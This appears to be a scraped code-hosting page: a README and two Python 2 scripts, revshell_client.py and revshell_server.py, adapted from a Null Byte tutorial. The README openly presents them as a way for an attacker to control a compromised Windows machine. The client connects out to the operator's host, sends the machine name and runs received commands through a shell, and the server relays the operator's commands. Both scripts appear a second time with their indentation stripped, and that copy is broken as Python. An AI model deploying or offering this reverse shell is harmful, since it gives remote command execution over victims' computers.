goldalworming/README.md

## README.md

      
    Raw
  

              README.md
            
          
    Reverse Shell Using Python

Via http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/
with some style changes (to use classes instead of globals).
Requirements:

a client: a Windows machine with Python installed (tested on Server 2012; probably works on 7 and 8 too)
a server: a Linux machine (might work elsewhere)

An attacker would use a pair of scripts like this to control a compromised
Windows box from her command server. The idea is that you run revshell_server.py
on the server in a terminal window (and just hang out as it listens for a
connection). When the client executes revshell_client.py, a prompt will appear
in the server console, awaiting commands.
Suppose your server IP address is 1.2.3.4
Execute on server:
$ python revshell_server.py

Execute on client:
C:\> python revshell_client.py 1.2.3.4


## revshell_client.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# revshell_client.py
# http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/

import socket, os, subprocess, sys, re

class ReverseShellClient:

    s = None

    def connect(self, host, port):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        port = int(port)
        try:
            print '[!] trying to connect to %s:%s' % (host, port)
            self.s.connect((host, port))
            print '[*] connection established'
            self.s.send(os.environ['COMPUTERNAME'])
        except:
            print >> sys.stderr, 'could not connect'

    def receive(self):
        received = self.s.recv(1024)
        tokens = re.split('\s+', received, 1)
        command = tokens[0]
        if command == 'quit':
            self.s.close()
        elif command == 'shell':
            if len(tokens) > 1:
                proc2 = subprocess.Popen(tokens[1], shell=True,
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE,
                    stdin=subprocess.PIPE)
                output = proc2.stdout.read() + proc2.stderr.read()
            else:
                output = 'args must follow "shell"'
        else:
            output = 'valid input is "quit" or "shell <cmd>" (e.g. "shell dir")'
        self.send(output)

    def send(self, output):
        self.s.send(output)
        self.receive()

    def stop():
        self.s.close()

if __name__ == '__main__':
    from argparse import ArgumentParser
    p = ArgumentParser()
    p.add_argument('host')
    p.add_argument('--port', '-p', type=int, default=58777)
    args = p.parse_args()
    client = ReverseShellClient()
    client.connect(args.host, args.port)
    client.receive()
    client.stop()

## revshell_server.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# revshell_server.py
# http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/

import sys, os, os.path
import socket

class ReverseShellServer:

    host = ''
    port = None
    s = None
    max_bind_retries = 10
    conn = None
    addr = None
    hostname = None

    def create(self, port):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = port

    def bind(self, current_try=0):
        try:
            print "listening on port %s (attempt %d)" % (self.port, current_try)
            self.s.bind((self.host, self.port))
            self.s.listen(1)
        except socket.error as msg:
            print >> sys.stderr, 'socket binding error:', msg[0]
            if current_try < self.max_bind_retries:
                print >> sys.stderr, 'retrying...'
                self.bind(current_try + 1)

    def accept(self):
        try:
            self.conn, self.addr = self.s.accept()
            print '[!] session opened at %s:%s' % (self.addr[0], self.addr[1])
            self.hostname = self.conn.recv(1024)
            self.menu()
        except socket.error as msg:
            print >> sys.stderr, 'socket accepting error:', msg[0]

    def menu(self):
        while True:
            cmd = raw_input(str(self.addr[0]) + '@' + str(self.hostname) + '> ')
            if cmd == 'quit':
                self.conn.close()
                self.s.close()
                return
            command = self.conn.send(cmd)
            result = self.conn.recv(16834)
            if result <> self.hostname:
                print result

def main(args):
    server = ReverseShellServer()
    server.create(args.port)
    server.bind()
    server.accept()
    print '[*] returned from socketAccept'
    return 0

if __name__ == '__main__':
    from argparse import ArgumentParser
    p = ArgumentParser()
    p.add_argument('--port', '-p', type=int, default=58777)
    args = p.parse_args()
    code = main(args)
    exit(code)
	#!/usr/bin/env python
	# -- coding: utf-8 --
	# revshell_client.py
	# http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/

	import socket, os, subprocess, sys, re

	class ReverseShellClient:

	s = None

	def connect(self, host, port):
	self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	port = int(port)
	try:
	print '[!] trying to connect to %s:%s' % (host, port)
	self.s.connect((host, port))
	print '[*] connection established'
	self.s.send(os.environ['COMPUTERNAME'])
	except:
	print >> sys.stderr, 'could not connect'

	def receive(self):
	received = self.s.recv(1024)
	tokens = re.split('\s+', received, 1)
	command = tokens[0]
	if command == 'quit':
	self.s.close()
	elif command == 'shell':
	if len(tokens) > 1:
	proc2 = subprocess.Popen(tokens[1], shell=True,
	stdout=subprocess.PIPE,
	stderr=subprocess.PIPE,
	stdin=subprocess.PIPE)
	output = proc2.stdout.read() + proc2.stderr.read()
	else:
	output = 'args must follow "shell"'
	else:
	output = 'valid input is "quit" or "shell <cmd>" (e.g. "shell dir")'
	self.send(output)

	def send(self, output):
	self.s.send(output)
	self.receive()

	def stop():
	self.s.close()

	if __name__ == '__main__':
	from argparse import ArgumentParser
	p = ArgumentParser()
	p.add_argument('host')
	p.add_argument('--port', '-p', type=int, default=58777)
	args = p.parse_args()
	client = ReverseShellClient()
	client.connect(args.host, args.port)
	client.receive()
	client.stop()
	#!/usr/bin/env python
	# -- coding: utf-8 --
	# revshell_server.py
	# http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/

	import sys, os, os.path
	import socket

	class ReverseShellServer:

	host = ''
	port = None
	s = None
	max_bind_retries = 10
	conn = None
	addr = None
	hostname = None

	def create(self, port):
	self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	self.port = port

	def bind(self, current_try=0):
	try:
	print "listening on port %s (attempt %d)" % (self.port, current_try)
	self.s.bind((self.host, self.port))
	self.s.listen(1)
	except socket.error as msg:
	print >> sys.stderr, 'socket binding error:', msg[0]
	if current_try < self.max_bind_retries:
	print >> sys.stderr, 'retrying...'
	self.bind(current_try + 1)

	def accept(self):
	try:
	self.conn, self.addr = self.s.accept()
	print '[!] session opened at %s:%s' % (self.addr[0], self.addr[1])
	self.hostname = self.conn.recv(1024)
	self.menu()
	except socket.error as msg:
	print >> sys.stderr, 'socket accepting error:', msg[0]

	def menu(self):
	while True:
	cmd = raw_input(str(self.addr[0]) + '@' + str(self.hostname) + '> ')
	if cmd == 'quit':
	self.conn.close()
	self.s.close()
	return
	command = self.conn.send(cmd)
	result = self.conn.recv(16834)
	if result <> self.hostname:
	print result

	def main(args):
	server = ReverseShellServer()
	server.create(args.port)
	server.bind()
	server.accept()
	print '[*] returned from socketAccept'
	return 0

	if __name__ == '__main__':
	from argparse import ArgumentParser
	p = ArgumentParser()
	p.add_argument('--port', '-p', type=int, default=58777)
	args = p.parse_args()
	code = main(args)
	exit(code)